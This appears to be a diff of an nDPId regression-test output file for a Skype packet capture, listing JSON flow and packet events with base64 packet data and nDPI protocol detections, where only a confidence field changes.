00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":127,"source":"skype.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1431969644055,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969644055,"pkt":"0NQSxnP1PBXCt3IOCABFAABAi\/oAAEARaz\/AqAEiwKgBAeA+ADUALBXIHdcBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAHAAB"} @@ -106,89 +106,89 @@ 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":443,"source":"skype.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1431969646148,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969646148,"pkt":"0NQSxnP1PBXCt3IOCABFAABLNJ0AAEARwpHAqAEiwKgBAeF+ADUAN7bIb04BAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":461,"source":"skype.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969648258,"flow_last_seen":1431969648258,"flow_idle_time":200000,"flow_min_l4_payload_len":291,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":291,"midstream":0,"thread_ts_msec":1431969648258,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"239.255.255.250","src_port":1025,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00829{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":461,"source":"skype.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1431969648258,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":333,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":333,"pkt_l4_len":299,"thread_ts_msec":1431969648258,"pkt":"AQBef\/\/6oPPBbTu2CABFAAE\/AooAAAQRAYTAqAD+7\/\/\/+gQBB2wBK+71Tk9USUZZICogSFRUUC8xLjENCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTEwMA0KTE9DQVRJT046IGh0dHA6Ly8xOTIuMTY4LjAuMjU0OjE5MDAvaWdkLnhtbA0KTlQ6IHVwbnA6cm9vdGRldmljZQ0KTlRTOiBzc2RwOmFsaXZlDQpTRVJWRVI6IFRQLUxJTksgV2lyZWxlc3MgTiBOYW5vIFJvdXRlciBXUjcwMk4sIFVQblAvMS4wDQpVU046IHV1aWQ6dXBucC1JbnRlcm5ldEdhdGV3YXlEZXZpY2UtMTkyMTY4MDI1NDc4OTAwMDAxOjp1cG5wOnJvb3RkZXZpY2UNCg0K"} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":461,"source":"skype.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969648258,"flow_last_seen":1431969648258,"flow_idle_time":200000,"flow_min_l4_payload_len":291,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":291,"midstream":0,"thread_ts_msec":1431969648258,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"239.255.255.250","src_port":1025,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":461,"source":"skype.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969648258,"flow_last_seen":1431969648258,"flow_idle_time":200000,"flow_min_l4_payload_len":291,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":291,"midstream":0,"thread_ts_msec":1431969648258,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"239.255.255.250","src_port":1025,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00852{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":462,"source":"skype.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1431969648274,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":351,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":351,"pkt_l4_len":317,"thread_ts_msec":1431969648274,"pkt":"AQBef\/\/6oPPBbTu2CABFAAFRAosAAAQRAXHAqAD+7\/\/\/+gQBB2wBPQhzTk9USUZZICogSFRUUC8xLjENCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTEwMA0KTE9DQVRJT046IGh0dHA6Ly8xOTIuMTY4LjAuMjU0OjE5MDAvaWdkLnhtbA0KTlQ6IHV1aWQ6dXBucC1JbnRlcm5ldEdhdGV3YXlEZXZpY2UtMTkyMTY4MDI1NDc4OTAwMDAxDQpOVFM6IHNzZHA6YWxpdmUNClNFUlZFUjogVFAtTElOSyBXaXJlbGVzcyBOIE5hbm8gUm91dGVyIFdSNzAyTiwgVVBuUC8xLjANClVTTjogdXVpZDp1cG5wLUludGVybmV0R2F0ZXdheURldmljZS0xOTIxNjgwMjU0Nzg5MDAwMDENCg0K"} 00924{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":463,"source":"skype.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1431969648291,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":405,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":405,"pkt_l4_len":371,"thread_ts_msec":1431969648291,"pkt":"AQBef\/\/6oPPBbTu2CABFAAGHAowAAAQRATrAqAD+7\/\/\/+gQBB2wBc+ePTk9USUZZICogSFRUUC8xLjENCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTEwMA0KTE9DQVRJT046IGh0dHA6Ly8xOTIuMTY4LjAuMjU0OjE5MDAvaWdkLnhtbA0KTlQ6IHVybjpzY2hlbWFzLXVwbnAtb3JnOmRldmljZTpJbnRlcm5ldEdhdGV3YXlEZXZpY2U6MQ0KTlRTOiBzc2RwOmFsaXZlDQpTRVJWRVI6IFRQLUxJTksgV2lyZWxlc3MgTiBOYW5vIFJvdXRlciBXUjcwMk4sIFVQblAvMS4wDQpVU046IHV1aWQ6dXBucC1JbnRlcm5ldEdhdGV3YXlEZXZpY2UtMTkyMTY4MDI1NDc4OTAwMDAxOjp1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCg0K"} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":477,"source":"skype.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969649862,"flow_last_seen":1431969649862,"flow_idle_time":7580000,"flow_min_l4_payload_len":277,"flow_max_l4_payload_len":277,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":277,"midstream":1,"thread_ts_msec":1431969649862,"l3_proto":"ip4","src_ip":"108.160.170.46","dst_ip":"192.168.1.34","src_port":443,"dst_port":49445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00844{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":477,"source":"skype.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1431969649862,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":343,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":343,"pkt_l4_len":309,"thread_ts_msec":1431969649862,"pkt":"PBXCt3IO0NQSxnP1CABFAAFJCUdAADQGY89soKouwKgBIgG7wSW4YeeiqCbN0IAYAEgh+QAAAQEICmF6dG0+IfU9FwMBARD7Uh6I13FzmcC+6gIV5n6AJhrBsHNwxcug1X4hBQozb5rifdWfxFgx5N7\/STRCna2lXcJzFlsdHwFqwb5pWB6kc7KLSFtZJ1+xqs\/LWpjXKXVYWA3FemYFVDyRXOngCpgT23pGW6q+fdoixXKwG46vp4NCAhC8D9JiN3KitsOr260NevBFtGudn3qUJfX\/3DhGLatA0j+U2CwrLM6DTOg9xpgfiq+azd0+zhMP0HAm0WOjBrmnGfTNcgHh+iJmkjL5sJ7TuSOU5HIOWUg6nL2f38I4\/Fmt1UsWozkMatK9FYjzbVIEXXgeh7hu8fTbVAUDu9Avc4N0XIcK0QG830wTIghFDiessVKi+sWFRr4k9g=="} -00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":477,"source":"skype.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969649862,"flow_last_seen":1431969649862,"flow_idle_time":7580000,"flow_min_l4_payload_len":277,"flow_max_l4_payload_len":277,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":277,"midstream":1,"thread_ts_msec":1431969649862,"l3_proto":"ip4","src_ip":"108.160.170.46","dst_ip":"192.168.1.34","src_port":443,"dst_port":49445,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Dropbox","breed":"Acceptable","category":"Cloud"}} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":477,"source":"skype.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969649862,"flow_last_seen":1431969649862,"flow_idle_time":7580000,"flow_min_l4_payload_len":277,"flow_max_l4_payload_len":277,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":277,"midstream":1,"thread_ts_msec":1431969649862,"l3_proto":"ip4","src_ip":"108.160.170.46","dst_ip":"192.168.1.34","src_port":443,"dst_port":49445,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Dropbox","breed":"Acceptable","category":"Cloud"}} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":478,"source":"skype.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1431969649862,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969649862,"pkt":"0NQSxnP1PBXCt3IOCABFAAA05cZAAEAGfGTAqAEibKCqLsElAbuoJs3QuGHot4AQD\/f34wAAAQEICj4iqE1henRt"} 01768{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":479,"source":"skype.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1431969649865,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1020,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1020,"pkt_l4_len":986,"thread_ts_msec":1431969649865,"pkt":"0NQSxnP1PBXCt3IOCABFAAPu\/qxAAEAGX8TAqAEibKCqLsElAbuoJs3QuGHot4AYEACQpAAAAQEICj4iqE9henRtFwMBACCGlFiiXnGNbnUA8eFNVg97y26hgjzRrXr8V0YtIj6nMBcDAQOQKBOjiVJxpWdYeLLT\/Xbro3HQPBzjJPC4nFo8EDiP\/qwXTbKKHYw0zh5BjL36gX1CXDX+RahFJG73NIEjJWIM604+RslBUiVdP7BtOTwH9Na9fDbxf2Np60NBtc7IDn0njVPn\/OQFpDztHwH7ReKVzxI3mekCkJeQu5frlXMtzYs\/A6\/788RG\/9eQL\/SpUlGx+OzCYIvqD3TfRfjbcI0rUIMK13b81m\/QfwBa7fmPZMBLpKLV+owE6zVvsZhb2YounO4vXImcKbLXc+pHduRZUFgR7JTndx4BwWKNOeOJb0lOXmVFpPD2t5ChyQpB8B7yAVMimVYrMkRjOI+yOmuEWzpBBb71HAu2RXfIAr1ik+\/qd4k78SdOCRVzA9X9FlfHQtMw2+\/RMHqj5tfPuEb1dJqljOBer+yTyAiFyXzsxxDLI9ugRcdcvYukWjNLVzxsQTVIpyochPhHmfXZ5n\/eZ4dJphlsEijiHWw2q71oBZmMc5GGD6vO7ZjLO3AJWFPWmwoscaJzsLs58ocuQ2qdcOCA7GGVHN\/ijVl75hciIPcfOvLZ6urcFhUq1WWuqtEbVnfmbri38YkIXbc7ejHLENq2QCqsgj5enMQz75I2\/pet\/YCSsRs1eqVYMNg8xjXCKqSJQl62\/bTcGsNwyoxippOcJq8VpG7H7Fvy+AXb68gGTkeGTRQKqtF74u9vbasRDNwPq8\/DPKRvzqNHk914l9uHQ2AKRiwOC\/bnlDR9ocQFekQhsprf\/xDrXO7tscQNAKBRL+tD76zQwjIPz3PJEHN3Pc+QE5WHu5rFSvvxfz\/Z2\/HSf2Um2ZE3koBnXh0ea61MNA9NADFAPSD8Z5NIyJgusH5hoNWKXVoIkzU5GHgbwG14JuajpHBJlMNEXsfmLLVK9oYSSz6nK+qKkyM3mC7X8XBCMQsh\/0ouHgH6HndraUIKsjtp3JPkKjI4aYdJ0qIoz0PG\/x3wOUA4h1YDaa67wXVn4YAKaKBMtrlL40SzVa5Z91cUYV13ZvBCGjlszRtWPZdtD1L\/SaFfIp1tQJKNS\/3Rzkx+IjbAX1llTBgWy3mJMF73JAKDegzbMvdSvKJ6AUv810GsIeQ99gKRkiy\/yhCs7P73CjnzDITEbSmsOsmYIQAoX97vBTFy0OqF392JfqJYzpguRdJo39kQQV95yc415TouOPz9jkaLSSogaYBmY8ija5cax3+df915"} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":500,"source":"skype.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969652367,"flow_last_seen":1431969652367,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969652367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":500,"source":"skype.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1431969652367,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431969652367,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+qlYAAEARtuTAqAEiQAQXpjLdnFYAKjPsm5AC0vz7eA6m1WQz3XSdSXIE0xPsZ0Mgdb244ufZVMBp9g=="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":500,"source":"skype.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969652367,"flow_last_seen":1431969652367,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969652367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":500,"source":"skype.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969652367,"flow_last_seen":1431969652367,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969652367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":503,"source":"skype.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969653376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.155","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":503,"source":"skype.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1431969653376,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431969653376,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4KG4AAEARcKrAqAEinTeCmzLdnFQAJDcMm5ICyNK5iZjkkcxv0MQR2rwmgaeyTFibCj82iA=="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":503,"source":"skype.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969653376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.155","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":503,"source":"skype.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969653376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.155","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":504,"source":"skype.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969653376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":504,"source":"skype.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1431969653376,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431969653376,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6eUkAAEARgjTAqAEib91NjjLdnFcAJt55m5QCPbPKJuLeDOim50Iw20p93HTUvcQYvwIjUtlP"} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":504,"source":"skype.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969653376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":13021,"dst_port":40023,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":504,"source":"skype.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969653376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":13021,"dst_port":40023,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":505,"source":"skype.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969653376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.15","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":505,"source":"skype.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1431969653376,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431969653376,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/jgcAAEARcPDAqAEib91KDzLdnFgAK3qlm5YCVGMQ34A4D4rgbT25j64U\/rdJx+5zd3Em6+QXhoxyxA8="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":505,"source":"skype.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969653376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.15","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":505,"source":"skype.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969653376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.15","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":506,"source":"skype.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969653376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":506,"source":"skype.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1431969653376,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431969653376,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5a+4AAEARkvDAqAEib91KLjLdnFsAJRNlm5gCrA8YBMpkQAilpoWSkSOFSSJ7mpap5i7P8hQ="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":506,"source":"skype.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969653376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":506,"source":"skype.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969653376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":507,"source":"skype.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969653376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":507,"source":"skype.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1431969653376,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969653376,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0K\/cAAEARbLHAqAEiQTffDzLdnFoAIDycm5oCpFKxpTcQMqT3s1qudFIeHwatW0Yo"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":507,"source":"skype.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969653376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":13021,"dst_port":40026,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 